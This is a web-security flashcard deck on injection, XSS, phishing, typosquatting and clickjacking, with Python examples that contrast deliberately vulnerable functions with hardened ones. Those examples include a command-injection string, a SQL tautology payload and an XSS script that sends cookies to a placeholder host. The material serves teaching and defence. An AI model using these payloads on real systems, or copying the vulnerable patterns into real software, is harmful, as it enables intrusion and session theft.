Web Security - Injections and Attacks Flashcards
Types of Injection Attacks
Web Security
- Command Injection Attacks
- File Inclusion Attacks
- HTML Injections
- SQL Injections
- Cross-Site Scripting/XSS Attacks
Define
Command Injection Attacks
Web Security
When user-supplied input is concatenated into an OS shell command, so an attacker can append shell metacharacters (;, |, &&, backticks) and run commands of their own on the server
Define
File Inclusion Attack
Web Security
When an application that includes files named by user input (e.g. PHP include/require) is tricked into executing or exposing files on the server (local file inclusion; attacker-hosted files if remote URLs are accepted)
Define
HTML Injection Attack
Web Security
Injecting HTML tags through unescaped user input so the page's markup is altered (e.g. a fake login form inserted into a trusted page)
Define
SQL Injection
Web Security
Manipulating an application's SQL queries through unsanitized input so the attacker can select, insert, update, or delete data the query was never meant to touch
Defenses against Injection Attacks
Web Security
- Sanitize user input: remove or escape meta-characters, and validate against an allow-list (accept only known-good values; reject everything else by default)
- Use the language's built-in sanitization/validation functions (e.g. PHP's filter functions) rather than ad-hoc string replacement
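The command-injection case from the definition above, as an added example that is not part of the original flashcards: the same input is run through a string-built shell command and through an allow-list plus argv-style call. `echo` stands in for a real network tool such as nslookup so the example runs offline; the payload string is constructed for the demonstration.

```python
import re
import shlex
import subprocess

# Allow-list for a hostname-like argument: letters, digits, dots and hyphens only.
# Anything else (spaces, ';', '|', '$', backticks, ...) is rejected, not "cleaned".
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")

# Constructed attacker input: a plausible value followed by a second shell command.
PAYLOAD = "example.com; echo INJECTED"


def vulnerable_echo(host: str) -> str:
    """Builds the command by string concatenation and hands it to /bin/sh.
    The ';' in the input ends the first command and starts the attacker's."""
    cmd = f"echo {host}"
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout


def hardened_echo(host: str) -> str:
    """Validates against the allow-list, then passes the value as one argv element
    with no shell involved, so metacharacters are never interpreted."""
    if not HOSTNAME_RE.fullmatch(host):
        raise ValueError(f"rejected input: {host!r}")
    out = subprocess.run(["echo", host], capture_output=True, text=True)
    return out.stdout


def quoted_command(host: str) -> str:
    """If a shell is unavoidable, shlex.quote turns the whole value into one literal word."""
    return f"echo {shlex.quote(host)}"


if __name__ == "__main__":
    print("vulnerable:", vulnerable_echo(PAYLOAD))   # second line of output is INJECTED
    print("quoted:    ", quoted_command(PAYLOAD))
    try:
        hardened_echo(PAYLOAD)
    except ValueError as err:
        print("hardened:  ", err)
```

Rejecting bad input outright is preferable to stripping metacharacters, because a block-list is only as complete as the author's knowledge of the shell's syntax.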
Defenses against SQL Injections
Web Security
- Never let user-supplied data modify the structure of a query (identifiers, keywords, or clauses)
- Stored procedures: isolate the application from raw SQL operations
- Prepared (parameterized) statements: a clear separation of code (the query) from data (the bound values)
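The tautology injection and the prepared-statement defence side by side, as an added example rather than code from the original deck. It uses Python's sqlite3 module with an in-memory database and constructed rows; the payload is the classic `' OR '1'='1` string.

```python
import sqlite3

# Constructed sample data in an in-memory database so the example runs offline.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, email TEXT, is_admin INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "alice@example.com", 1),
        ("bob", "bob@example.com", 0),
    ])
    return conn


# Closes the string literal and appends an always-true condition.
PAYLOAD = "nobody' OR '1'='1"


def find_user_vulnerable(conn, username):
    """Data is spliced into the query text, so the attacker's quote character
    changes the SQL grammar: WHERE username = 'nobody' OR '1'='1'."""
    sql = f"SELECT username, email FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, username):
    """Prepared statement: the query is compiled first and the value is bound
    afterwards as pure data, so it can never become part of the SQL."""
    sql = "SELECT username, email FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def safe_order_by(conn, column):
    """Identifiers (table/column names) cannot be bound as parameters; the only
    safe option is an allow-list of the identifiers the application supports."""
    allowed = {"username", "email"}
    if column not in allowed:
        raise ValueError(f"unsupported sort column: {column!r}")
    return conn.execute(f"SELECT username FROM users ORDER BY {column}").fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", find_user_vulnerable(db, PAYLOAD))  # returns every row
    print("prepared:  ", find_user_safe(db, PAYLOAD))        # returns nothing
```

The `safe_order_by` function shows the limit of prepared statements: they protect values, not query structure, which is why the first defence on the list (no user data in the structure) still matters.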
Define
Cross-Site Scripting/XSS Attacks
Web Security
Injecting attacker-controlled script (typically via a script tag, but also via event-handler attributes) into a page so that it executes in other users' browsers with the site's origin and session
What are the two types of XSS attacks?
Web Security
Stored and reflected (DOM-based XSS, where client-side script writes untrusted data into the page, is often counted as a third)
Define
Stored XSS Attack
Web Security
Injected code permanently stored on the server (e.g. in a comment, profile field, or message) and served to every user who views that content
Define
Reflected XSS Attack
Web Security
Injected code carried in an attacker-crafted link (e.g. a URL parameter) that the vulnerable site echoes back into its response; activated when the victim clicks the attacker's link
Defenses against XSS Attacks
Web Security
Sanitize all data and input so that it cannot introduce new code or markup, using output escaping and a Content Security Policy
Define
Output Escaping
Web Security
Special characters (< > & " ') are replaced with character entities (&lt; &gt; &amp; &quot; &#x27;) so that user input cannot contain characters that build HTML elements or attributes
Define
Content Security Policy
Web Security
Allows the server to specify, via a response header, what is or isn't allowed during page rendering (script sources, inline script, framing), with the browser enforcing the policy
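An added example covering the three XSS defences above (escaping in element and attribute context, an allow-listed URL scheme, and a nonce-based CSP header); it is not code from the original flashcards. The three payload strings are constructed attacker inputs, and the template is a hypothetical comment widget.

```python
import html
import secrets
from urllib.parse import urlsplit

# Constructed attacker-controlled inputs, as they might arrive from a comment form.
SCRIPT_PAYLOAD = '<script>document.location="https://evil.example/?c="+document.cookie</script>'
ATTR_PAYLOAD = '" onmouseover="alert(1)'
URL_PAYLOAD = "javascript:alert(document.domain)"


def render_comment_vulnerable(author, body):
    """Raw interpolation: the browser parses attacker text as markup."""
    return f'<div class="comment" data-author="{author}">{body}</div>'


def render_comment_safe(author, body):
    """Output escaping: every character that could open or close a tag or attribute
    is replaced by its entity, in both element and attribute context."""
    return (f'<div class="comment" data-author="{html.escape(author, quote=True)}">'
            f'{html.escape(body, quote=True)}</div>')


def safe_href(url):
    """Escaping alone does not make a URL attribute safe: javascript: is still a valid
    link after escaping. Allow-list the scheme, then escape for the attribute."""
    scheme = urlsplit(url.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def new_nonce():
    """Fresh per-response nonce; a script tag must carry it to be allowed to run."""
    return secrets.token_urlsafe(16)


def csp_header(nonce):
    """Content-Security-Policy value: only scripts carrying this nonce execute, so an
    injected inline <script> is refused even if escaping were to fail somewhere."""
    return (f"default-src 'self'; script-src 'nonce-{nonce}'; "
            "object-src 'none'; base-uri 'none'")


if __name__ == "__main__":
    nonce = new_nonce()
    print("Content-Security-Policy:", csp_header(nonce))
    print(render_comment_safe(ATTR_PAYLOAD, SCRIPT_PAYLOAD))
    print('<a href="%s">link</a>' % safe_href(URL_PAYLOAD))
```

Escaping is context-dependent: the entity set that neutralises text inside an element does nothing for a `javascript:` URL or for data written into a script block, so each output context needs its own rule.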
Types of UI Attacks
Web Security
- Phishing Attacks
- Manipulating URLS
- Clickjacking
- Click Interception
Describe
Phishing Attacks
Web Security
Mimicking legit sites to lure users and reveal sensitive data
Defenses against Phishing Attacks
Web Security
- Search engines and browsers remove or filter out known phishing sites (safe-browsing block lists)
- The user checks the actual URL of the site they are on, or of a link before clicking it
Ways to manipulate URLs
Web Security
URL Obfuscation/Typosquatting and Internationalized Domain Name Homograph Attacks
Define
URL Obfuscation/Typosquatting
Web Security
Registering domains that look similar to a legitimate one or are common misspellings of it, so a careless reader or a mistyped address lands on the attacker's site
Provide an example of URL Obfuscation/Typosquatting
Web Security
google.com versus gooogle.com
Define
Internationalized Domain Name Homograph Attack
Web Security
Building a domain from Unicode characters of another script that look like ASCII letters (e.g. Cyrillic "а" U+0430 in place of Latin "a"), so the address bar shows what appears to be the real domain while the browser resolves a different (Punycode, xn--) name
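A small lookalike-domain check covering both the typosquatting and the homograph cards above, added here as an example and not part of the original deck. The brand list and sample domains are constructed; the mixed-script test derives each letter's script from its Unicode character name, and the Punycode step shows the name a browser would actually resolve.

```python
import unicodedata

# Constructed list of brands to protect and constructed lookalike domains.
KNOWN_BRANDS = {"google.com", "apple.com", "paypal.com"}
SAMPLES = [
    "google.com",      # legitimate
    "gooogle.com",     # typosquat: one inserted character
    "paypa1.com",      # typosquat: digit 1 in place of letter l
    "\u0430pple.com",  # homograph: Cyrillic small a (U+0430) in place of Latin a
]


def edit_distance(a, b):
    """Levenshtein distance, used to catch near-misspellings of a known brand."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def scripts_in(label):
    """Set of Unicode scripts (first word of the character name) of the letters in a label."""
    return {unicodedata.name(ch).split()[0] for ch in label if ch.isalpha()}


def to_punycode(domain):
    """What the browser resolves: non-ASCII labels are encoded as xn-- (Punycode) labels."""
    return domain.encode("idna").decode("ascii")


def classify(domain):
    """Returns 'ok', 'typosquat' or 'homograph' for a domain string."""
    if domain in KNOWN_BRANDS:
        return "ok"
    for label in domain.lower().split("."):
        if len(scripts_in(label)) > 1:      # Latin and Cyrillic letters in one label
            return "homograph"
    try:
        if to_punycode(domain) != domain:   # any IDN label not on our known list
            return "homograph"
    except UnicodeError:                    # label rejected by IDNA processing
        return "homograph"
    for brand in KNOWN_BRANDS:
        if edit_distance(domain, brand) <= 1:
            return "typosquat"
    return "ok"


if __name__ == "__main__":
    for d in SAMPLES:
        print(f"{d!r:22} {to_punycode(d):22} {classify(d)}")
```

A single-script label that is entirely Cyrillic (no Latin letters mixed in) passes the mixed-script test, which is why the Punycode comparison is kept as a second check: a lookalike built purely from another script still produces an `xn--` name.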
Define
Clickjacking/UI Redressing
Web Security
Luring the user into clicking an element they cannot see, by layering a transparent iframe of the target site over (or under) visible decoy content, so the click lands on the framed page rather than the one the user believes they are interacting with
What does clickjacking bypass?
Web Security
The protection users expect from the Same-Origin Policy (SOP): the attacker's page still cannot read the framed page, but it can get the user to act on it
What does clickjacking compromise?
Web Security
Context Integrity
Define
Context Integrity
Web Security
Visual + Temporal Integrity
Describe
Visual Integrity
Web Security
What the user sees (the target element and the pointer) is what will actually receive the click; nothing is hidden, covered, or displaced
Describe
Temporal Integrity
Web Security
The target and pointer the user saw when deciding to click are the same ones present when the click lands; the UI must not change in the interval between the decision and the action
Defenses against clickjacking
Web Security
- User confirmation before taking sensitive actions
- UI randomization - sensitive controls are placed at random positions so an overlay cannot be aligned with them
- Framebusting - script in the page that breaks out of a frame (e.g. when top is not self)
- X-Frame-Options header (DENY / SAMEORIGIN) - tells the browser whether the page may be rendered inside a frame; CSP frame-ancestors is the modern replacement
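An added example, not from the original flashcards, of the check a tester runs on the header-based defences above: given a page's response headers, would a browser let a given site frame it? It follows the rule that a CSP frame-ancestors directive overrides X-Frame-Options when both are present; the header dictionaries in the usage are constructed, and only exact origin sources (no host wildcards or bare scheme sources) are handled.

```python
from urllib.parse import urlsplit


def _origin(url):
    """scheme://host[:port], lower-cased, which is what framing checks compare."""
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}".lower()


def frameable_by(headers, page_url, framer_url):
    """True if a browser would allow framer_url to embed page_url in an iframe,
    judging only by the anti-framing response headers of page_url."""
    h = {k.lower(): v for k, v in headers.items()}
    page, framer = _origin(page_url), _origin(framer_url)

    # CSP frame-ancestors takes precedence over X-Frame-Options when present.
    csp = h.get("content-security-policy", "")
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if not parts or parts[0].lower() != "frame-ancestors":
            continue
        sources = [s.lower() for s in parts[1:]]
        if "'none'" in sources:
            return False
        if "*" in sources:
            return True
        if "'self'" in sources and framer == page:
            return True
        # Remaining sources are treated as exact origins (host-only sources assumed https).
        return any(_origin(s if "://" in s else "https://" + s) == framer
                   for s in sources if not s.startswith("'"))

    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return framer == page
    return True   # no anti-framing header: any site may frame the page


if __name__ == "__main__":
    page = "https://bank.example/transfer"
    evil = "https://evil.example/"
    print(frameable_by({}, page, evil))                                   # True
    print(frameable_by({"X-Frame-Options": "DENY"}, page, evil))          # False
    print(frameable_by({"Content-Security-Policy": "frame-ancestors 'self' https://partner.example"},
                       page, "https://partner.example/widget"))           # True
```

The last branch (no header at all) is the common finding: a page with neither header relies entirely on framebusting script, which the next card notes can be unreliable.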
Limitations with clickjacking defenses
Web Security
- Degrades user experience
- May be unreliable or easily defeated
Define
Click Interception
Web Security
Hijacking the user's clicks on a page (e.g. by wrapping content in attacker links or attaching click handlers) so that a click intended for ordinary page content forces a visit to an attacker-chosen URL